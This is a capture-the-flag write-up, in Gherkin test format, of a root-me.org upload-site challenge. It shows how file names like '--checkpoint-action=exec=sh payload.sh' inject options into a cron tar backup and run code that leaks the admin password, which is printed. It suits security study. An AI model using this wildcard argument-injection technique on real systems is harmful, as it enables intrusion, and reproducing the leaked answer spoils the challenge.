## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Realistic
  User:
    mr_once
  Goal:
    Get the password of the administration area.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ArchLinux            | 2020.06.01 |
    | Brave       | 1.10.97 |
    | OWSAP ZAP |  2.9.0 |
  Machine information:
    Given I have the url of the site
    And it is an uploader
    And there is a message that says
    """
    We are taking care of your files :
      - frequent backups : this opensource script is launched every 5
          minutes for saving your files.
      - firewall is ON !
    """
    And the code of the script is
    """
    #!/bin/bash

    BASEPATH=$(dirname `readlink -f "$0"`)
    BASEPATH=$(dirname "$BASEPATH")

    cd "$BASEPATH/tmp/upload/$1"
    tar cvf "$BASEPATH/tmp/save/$1.tar" *
    """
    Then I try to exploit the site

  Scenario: Fail: Upload PHP code
    Given the uploader
    Then I try to upload a php file with the code
    """
    <?php
      phpinfo();
    ?>
    """
    Then I see that the server does not execute the code
    Then I can't upload a shell this way

  Scenario: Success: Find Admin Panel
    Given I have to get the admin password
    Then I look for the admin panel using a fuzz attack with ZAP
    And I found the admin panel at admin/index.php [evidence](adminpanel.png)

  Scenario: Success: Linux wildcard exploiting
    Given The script's code
    Then I look for posible vulnerabilities
    Then I learn how to exploit a wildcard in Linux using the tar command
    Then I work on a little PoC on my local machine creating the files
    """
      --checkpoint=1
      --checkpoint-action=exec=sh payload.sh
      payload.sh
    """
    And the payload has the following code
    """
    #!/bin/bash
    touch test.txt
    """
    Then when I try to compress the files with the command
    """
    tar cvf out.tar *
    """
    And I see that two new files are created: out.tar and test.txt
    Then I see that it works
    Then I try it on the server with a little modification to payload.sh
    """
    cp ../../../admin/index.php index_admin.txt
    """
    And after several minutes I see that index_admin.txt was added to the list
    And it has the following code
    """
    <?php
    session_start();
    if ($_POST['password'] === "St0rAgeInn0vati0n!p@sSwordAdm!N")
      $_SESSION['is_admin'] = true;
    ?>
    <!DOCTYPE html>
    <html lang="en">
      <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Ultra Upload</title>
        <link href="../bootstrap/css/bootstrap.min.css" rel="stylesheet">
      </head>
      <body>
    <div class="jumbotron">
        <h1>Ultra upload</h1>
        <p>New service of web storage for your files ! Free and easy,
        but secure !</p>
    </div>

    <div style="margin:0 20px;">


    <?php if (!$_SESSION['is_admin']) { ?>

    <div class="well">
    <form class="form-inline" role="form" method="post"
    enctype="multipart/form-data">
      <div class="form-group">
        <label for="newfile">Password :</label>
        <input type="password" id="password" name="password"
        placeholder="Admin password here !">
      </div>
      <button type="submit" class="btn btn-default">Login !</button>
    </form>
    </div>

    <?php } else { ?>
    <div class="alert alert-success" role="alert">YEAAHHHHHH ! You can
    validate the challenge with the password of this admin area !</div>
    <?php } ?>

    </div>
        <script src="../bootstrap/js/jquery.min.js"></script>
        <script src="../bootstrap/js/bootstrap.min.js"></script>
      </body>
    </html>
    """
    Then I see the password [evidence](passwd.png)
    And I solve the challenge
